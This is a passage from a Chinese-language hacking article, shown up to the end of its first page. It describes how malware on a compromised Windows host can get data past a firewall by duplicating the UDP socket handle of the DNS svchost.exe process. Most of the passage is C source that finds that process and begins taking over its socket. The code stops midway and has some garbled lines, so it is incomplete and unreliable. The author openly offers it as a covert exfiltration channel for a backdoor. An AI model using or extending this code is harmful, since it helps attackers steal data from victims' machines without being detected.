使用该技术背景:在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么). 针对目前_blank">防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.相反,有一点我们也很清楚:被_blank">防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单:将其他进程中允许数据传输的套接字句柄拿为已用.过程如下: 1. 找出目标进程2. 找出SOCKET句柄2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用.3. 用转换后的SOCKET进行数据传输 上面的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP.针对不同系统不同进程我们很难定位一个稳定的进程SOCKET. 看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的"黄金大道". 我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀... 下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子.编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等.具体解决方法请细看注释部分... #include <winsock2.h>#include <stdio.h>#include <wtsapi32.h> #pragma comment(lib, "ws2_32")#pragma comment(lib, "wtsapi32") #define NT_SUCCESS(status) ((NTSTATUS)(status)>=0)#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) typedef LONG NTSTATUS; typedef struct _SYSTEM_HANDLE_INFORMATION{ ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess;} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG); ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL; BOOL LocateNtdllEntry ( void ){ BOOL ret = FALSE; char NTDLL_DLL[] = "ntdll.dll"; HMODULE ntdll_dll = NULL; if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL ) { printf( "GetModuleHandle() failed"); return( FALSE ); } if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) ) { goto LocateNtdllEntry_exit; } ret = TRUE; LocateNtdllEntry_exit: if ( FALSE == ret ) { printf( "GetProcAddress() failed"); } ntdll_dll = NULL; return( ret );} /* This routine is used to get a process's username from it's SID--*/BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName){ // sanity checks and default value if (pUserSid == NULL) return false; strcpy(szUserName, "?"); SID_NAME_USE snu; TCHAR szUser[_MAX_PATH]; DWORD chUser = _MAX_PATH; PDWORD pcchUser = &chUser; TCHAR szDomain[_MAX_PATH]; DWORD chDomain = _MAX_PATH; PDWORD pcchDomain = &chDomain; // Retrieve user name and domain name based on user's SID. if ( ::LookupAccountSid( NULL, pUserSid, szUser, pcchUser, szDomain, pcchDomain, &snu ) ) { wsprintf(szUserName, "%s", szUser); } else { return false; } return true;} /* This routine is used to get the DNS process's Id Here, I use WTSEnumerateProcesses to get process user Sid, and then get the process user name. Beacause as it's a "NETWORK SERVICE", we cann't use OpenProcessToken to catch the DNS process's token information,even if we has the privilege in catching the SYSTEM's. --*/DWORD GetDNSProcessId(){ PWTS_PROCESS_INFO pProcessInfo = NULL; DWORD ProcessCount = 0; char szUserName[255]; DWORD Id = -1; if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount)) { // dump each process description for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess ) { if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 ) { GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName); if( strcmp(szUserName, "NETWORK SERVICE") == 0) { Id = pProcessInfo[CurrentProcess].ProcessId; break; } } } WTSFreeMemory(pProcessInfo); } return Id;} /* This doesn't work as we know, sign...but you can use the routine for other useing...--*//*BOOL GetProcessUserFromId(char *szAccountName, DWORD PID){ HANDLE hProcess = NULL, hAccessToken = NULL; TCHAR InfoBuffer[1000], szDomainName[200]; PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer; DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200; SID_NAME_USE snu; hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID); if(hProcess == NULL) { printf("OpenProcess wrong"); CloseHandle(hProcess); return false; } if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken)) { printf("OpenProcessToken wrong:x", GetLastError()); return false; } GetTokenInformation(hAccessToken,TokenUser,InfoBuffer, 1000, &dwInfoBufferSize); LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName, &dwAccountSize,szDomainName, &dwDomainSize, &snu); if(hProcess) CloseHandle(hProcess); if(hAccessToken) CloseHandle(hAccessToken); return true;}*/ /* Now, it is the most important stuff... ^_^--*/SOCKET GetSocketFromId (DWORD PID){ NTSTATUS status; PVOID buf = NULL; ULONG size = 1; ULONG NumOfHandle = 0; ULONG i; PSYSTEM_HANDLE_INFORMATION h_info = NULL; HANDLE sock = NULL; DWORD n; buf=malloc(0x1000); if(buf == NULL) { printf("malloc wrong\n"); return NULL; } status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n ); if(STATUS_INFO_LENGTH_MISMATCH == status) { free(buf); 1 2 下一页